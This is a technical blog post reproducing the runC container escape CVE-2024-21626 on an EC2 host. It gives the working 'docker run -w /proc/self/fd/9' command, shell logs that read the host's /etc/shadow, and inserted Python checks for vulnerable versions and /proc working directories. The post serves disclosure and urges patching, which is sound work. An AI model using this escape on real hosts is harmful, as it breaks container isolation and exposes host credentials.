Bill WANG

Summary

The web content describes a detailed test and analysis of the container escape vulnerability CVE-2024-21626, affecting runC and other related container tools, and emphasizes the importance of upgrading to patched versions.

Abstract

The article "Illustrate runC Escape Vulnerability CVE-2024-21626 with my tests" provides an in-depth examination of the CVE-2024-21626 vulnerability, which allows attackers to escape from containers running on affected versions of runC (v1.0.0-rc93 to v1.1.11) and Docker (fixed in v25.0.2). The author conducts tests on an AWS EC2 instance using RHEL-8 AMI and demonstrates how the vulnerability can be exploited to access sensitive host files such as /etc/hostname and /etc/shadow without any host directories being mounted. The tests are initially conducted with older, vulnerable versions of Docker and containerd, and then repeated with the latest, patched versions to show that the issue has been resolved in the updated releases. The author concludes by urging readers to upgrade their systems promptly, noting that some operating systems may not yet have patches available, especially if they have reached End-of-Life (EOL). References to Docker's security advisory, Red Hat's CVE status, and other relevant resources are provided for further information.

Opinions

  • The author emphasizes the severity of CVE-2024-21626, as it not only allows container escape but also potentially gives full control over the host system.
  • The article suggests that the vulnerability is a significant concern for containerized environments and that immediate action is required to mitigate the risk.
  • The author points out that while patches are available, some systems may still be vulnerable due to lack of updates or because they are running EOL operating systems.
  • The inclusion of detailed commands and output logs indicates the author's technical proficiency and a didactic approach to sharing knowledge about the vulnerability and its resolution.
  • By providing a step-by-step account of the testing process, the author underscores the importance of thorough security testing and the value of up-to-date container runtime and orchestration tools.

Illustrate runC Escape Vulnerability CVE-2024-21626 with my tests

CVE-2024-21626

The vulnerability CVE-2024-21626 allows an attacker to escape from containers.

runC, the container runtime component, published version 1.1.12 on 31 Jan 2024 to fix CVE-2024-21626, which allows escaping from containers. The affected versions are >= v1.0.0-rc93 and <= 1.1.11.

For containerd, the fixed versions are 1.6.28 and 1.7.13; the affected versions are 1.4.7 to 1.6.27 and 1.7.0 to 1.7.12.

For Docker, the fixed version is 25.0.2.
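As an added example (not from the original post): a short Python check that parses `docker version` output and compares the reported Engine, containerd and runc versions against the affected ranges listed above. The function names are mine, the "docker" range is my encoding of "fixed in 25.0.2", and the sample is a trimmed copy of the first `docker version` run shown later in the post.

```python
import re

# Affected ranges as stated in the article (inclusive). Release candidates
# such as v1.0.0-rc93 must sort below the final 1.0.0; see version_key().
AFFECTED = {
    "runc": [("1.0.0-rc93", "1.1.11")],
    "containerd": [("1.4.7", "1.6.27"), ("1.7.0", "1.7.12")],
    "docker": [("0.0.0", "25.0.1")],  # Engine fixed in 25.0.2
}
_VER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-rc(\d+))?$")

def version_key(v):
    """'v1.0.0-rc93' -> (1, 0, 0, 0, 93); '1.0.0' -> (1, 0, 0, 1, 0)."""
    m = _VER.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised version: {v!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))

def is_affected(component, version):
    k = version_key(version)
    return any(version_key(lo) <= k <= version_key(hi) for lo, hi in AFFECTED[component])

def parse_docker_version(output):
    """Pull the Engine, containerd and runc versions out of `docker version` text."""
    found, section = {}, None
    for line in output.splitlines():
        s = line.strip()
        if s in ("Engine:", "containerd:", "runc:"):
            section = "docker" if s == "Engine:" else s[:-1]
        elif s.startswith("Version:") and section:
            found[section] = s.split(":", 1)[1].strip()
            section = None  # only the first Version: line of each section counts
    return found

def assess(output):
    """Return {component: (version, vulnerable)} for each component found."""
    return {c: (v, is_affected(c, v)) for c, v in parse_docker_version(output).items()}

# Server half of the article's first `docker version` run, trimmed to the lines
# the parser needs (client-side lines carry no section header and are ignored).
SAMPLE = """\
Server: Docker Engine - Community
 Engine:
  Version:          24.0.4
  API version:      1.43 (minimum version 1.12)
 containerd:
  Version:          1.6.27
 runc:
  Version:          1.1.11
"""
```

Feed it the real output with `assess(subprocess.check_output(["docker", "version"], text=True))` on a host you administer; any `True` flag means that component still needs the upgrade described in the post.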

Run the test in an AWS EC2 instance, using the RHEL-8 AMI image from the AWS Marketplace

# Use Red Hat 8 as the sample
$ yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo

# To install the older versions, the containerd package must be
# installed before the docker packages
$ yum list containerd.io --showduplicates

# containerd is not listed again when installing the docker engine,
# because it has already been installed (old version); run the list
# command with "--showduplicates" to see every available version
$ yum list docker-ce --showduplicates
...

# To see all dependencies of "docker-ce" you can run
# "yum install docker-ce" and decline the confirmation ("Y")
# So the final installation commands are
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo

sudo yum install containerd.io-1.6.27-3.1.el8 \
  docker-buildx-plugin-0.10.5-1.el8 \
  docker-compose-plugin-2.20.2-1.el8 \
  docker-ce-cli-1:24.0.4-1.el8 \
  docker-ce-rootless-extras-24.0.4-1.el8 \
  docker-ce-3:24.0.4-1.el8

Enable the docker service

$ sudo systemctl start docker
$ sudo systemctl enable docker

# Post-installation steps for Linux.
# For example, give ssm-user permission to run docker;
# if the group already exists, ignore the error
$ sudo groupadd docker
$ sudo usermod -aG docker ssm-user

Show the docker versions. They are all older versions, which can be used to reproduce the issue now.

sh-4.4$ docker version
Client: Docker Engine - Community
 Version:           24.0.4
 API version:       1.43
 Go version:        go1.20.5
 Git commit:        3713ee1
 Built:             Fri Jul  7 14:52:00 2023
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          24.0.4
  API version:      1.43 (minimum version 1.12)
  Go version:       go1.20.5
  Git commit:       4ffc614
  Built:            Fri Jul  7 14:51:01 2023
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.6.27
  GitCommit:        a1496014c916f9e62104b33d1bb5bd03b0858e59
 runc:
  Version:          1.1.11
  GitCommit:        v1.1.11-0-g4bccb38
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0
sh-4.4$

Run the test

I tested several times, with:

  • /proc/self/fd/7
  • /proc/self/fd/8
  • /proc/self/fd/9

Finally I successfully ran the container with /proc/self/fd/9

docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm

So the container can read the host’s /etc/hostname and /etc/shadow without mounting any host folders at all.

  • ip-10-140-11-6.ap-southeast-2.compute.internal
  • ssm-user:!!:19760:7:365:7:30::

These values only exist on the AWS EC2 instance (the host), not in the container image.
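As an added defensive example, not part of the original post: a small check over `docker inspect` output (or an OCI runtime config.json) that flags containers whose working directory points under /proc, the pattern the test above relies on. It is a pre-start sanity check that complements, not replaces, the upgrade; the function names and the sample JSON are mine (constructed), and the policy of flagging anything under /proc is a conservative assumption.

```python
import json
import posixpath

def suspicious_cwd(cwd):
    """Return a reason string if a container working directory looks unsafe, else None.

    Conservative policy: no legitimate image needs its working directory under
    /proc, so anything that normalises to /proc (or below it) is flagged. The
    article's test used -w /proc/self/fd/9, which this catches.
    """
    if not cwd:
        return None  # Docker defaults to / when WorkingDir is empty
    if not cwd.startswith("/"):
        return f"relative working directory {cwd!r}"
    norm = posixpath.normpath(cwd)  # collapses ".." components before checking
    if norm == "/proc" or norm.startswith("/proc/"):
        return f"working directory {cwd!r} resolves under /proc ({norm})"
    return None

def audit_oci_spec(spec):
    """Check an OCI runtime config.json dict (process.cwd); returns a reason or None."""
    return suspicious_cwd(spec.get("process", {}).get("cwd", ""))

def audit_docker_inspect(inspect_json):
    """Check `docker inspect` output (a JSON list); returns {container_name: reason}."""
    findings = {}
    for ctr in json.loads(inspect_json):
        reason = suspicious_cwd(ctr.get("Config", {}).get("WorkingDir", ""))
        if reason:
            findings[ctr.get("Name", "?").lstrip("/")] = reason
    return findings

# Constructed `docker inspect` excerpt (only the fields the check reads),
# using the container names from the article.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/cve-2024-21626", "Config": {"WorkingDir": "/proc/self/fd/9"}},
    {"Name": "/cve", "Config": {"WorkingDir": ""}},
    {"Name": "/web", "Config": {"WorkingDir": "/srv/app"}},
])

if __name__ == "__main__":
    for name, reason in audit_docker_inspect(SAMPLE_INSPECT).items():
        print(f"{name}: {reason}")
```

On a real host, pipe `docker inspect $(docker ps -q)` into `audit_docker_inspect` to review every running container.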

Run the test with the latest Docker versions

Remove the old packages and install the latest Docker

# clean the old versions
$ sudo yum remove docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# install the latest versions
$ sudo yum install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

# start the docker service
$ sudo systemctl start docker

sh-4.4$ docker version
Client: Docker Engine - Community
 Version:           25.0.3
 API version:       1.44
 Go version:        go1.21.6
 Git commit:        4debf41
 Built:             Tue Feb  6 21:15:16 2024
 OS/Arch:           linux/amd64
 Context:           default

Server: Docker Engine - Community
 Engine:
  Version:          25.0.3
  API version:      1.44 (minimum version 1.24)
  Go version:       go1.21.6
  Git commit:       f417435
  Built:            Tue Feb  6 21:14:12 2024
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          1.6.28
  GitCommit:        ae07eda36dd25f8a1b98dfbf587313b99c0190bb
 runc:
  Version:          1.1.12
  GitCommit:        v1.1.12-0-g51d5e94
 docker-init:
  Version:          0.19.0
  GitCommit:        de40ad0

When I ran the same command, I couldn’t run the container, so I just ran a container without -w /proc/self/fd/8

$ docker run --name cve --rm -it debian:bookworm bash
root@5d48184c930d:/proc/self/fd# ls
0  1  2  255

# I can't view the host's files from the container now

All logs for your reference

sh-4.4$ docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
Unable to find image 'debian:bookworm' locally
bookworm: Pulling from library/debian
6a299ae9cfd9: Pull complete
Digest: sha256:79becb70a6247d277b59c09ca340bbe0349af6aacb5afa90ec349528b53ce2c9
Status: Downloaded newer image for debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/8: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/7 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory: unknown.
sh-4.4$ docker run -w /proc/self/fd/6 --name cve-2024-21626 --rm -it debian:bookworm
docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: mkdir /proc/self/fd/6: not a directory: unknown: Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type.
sh-4.4$ docker run -w /proc/self/fd/9 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@a3238ac6f149:.# ls -F
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
blkio/  cpu@  cpu,cpuacct/  cpuacct@  cpuset/  devices/  freezer/  hugetlb/  memory/  net_cls@  net_cls,net_prio/  net_prio@  perf_event/  pids/  rdma/  systemd/
root@a3238ac6f149:.# ls ../../../../../
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
bin  boot  data  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@a3238ac6f149:.# ls ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/hostname
root@a3238ac6f149:.# ls ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
../../../../../etc/shadow
root@a3238ac6f149:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
ip-10-140-11-6.ap-southeast-2.compute.internal
root@a3238ac6f149:.# cat ../../../../../etc/shadow
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root:*:19324:0:99999:7:::
bin:*:19324:0:99999:7:::
daemon:*:19324:0:99999:7:::
adm:*:19324:0:99999:7:::
lp:*:19324:0:99999:7:::
sync:*:19324:0:99999:7:::
shutdown:*:19324:0:99999:7:::
halt:*:19324:0:99999:7:::
mail:*:19324:0:99999:7:::
operator:*:19324:0:99999:7:::
games:*:19324:0:99999:7:::
ftp:*:19324:0:99999:7:::
nobody:*:19324:0:99999:7:::
dbus:!!:19725::::::
systemd-coredump:!!:19725::::::
systemd-resolve:!!:19725::::::
tss:!!:19725::::::
polkitd:!!:19725::::::
unbound:!!:19725::::::
sssd:!!:19725::::::
chrony:!!:19725::::::
sshd:!!:19725::::::
ec2-user:!!:19759:0:99999:7:::
cwagent:!!:19759::::::
rpc:!!:19759:7:365:7:30::
rpcuser:!!:19759::::::
splunk:!!:19759:7:365:7:30::
ssm-user:!!:19760:7:365:7:30::
root@a3238ac6f149:.# pwd
pwd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

Conclusion

The vulnerability CVE-2024-21626 not only enables malicious actors to escape containerized environments but also allows full control over the underlying host system.

Please upgrade (yum or apt) your operating system packages as soon as possible. However, the CVE is very new, so the patch may not be ready yet for some operating systems, and if your OS has reached EOL there will be no patch for this CVE at all.

Reference

Docker Security Advisory: Multiple Vulnerabilities in runc, BuildKit, and Moby — A patch (4.27.1) is now available for Docker Desktop.

Nitro’s Blog: Illustrate runC Escape Vulnerability CVE-2024-21626

Containers inherit breakout bugs in Linux tools

Red Hat CVE Status — CVE-2024-21626

Ubuntu CVE status — CVE-2024-21626

AWS Linux (1/2/2023) Status

Debian Status

Learning is fun

# CVE-2024-21626 # Security # Docker # Kubernetes
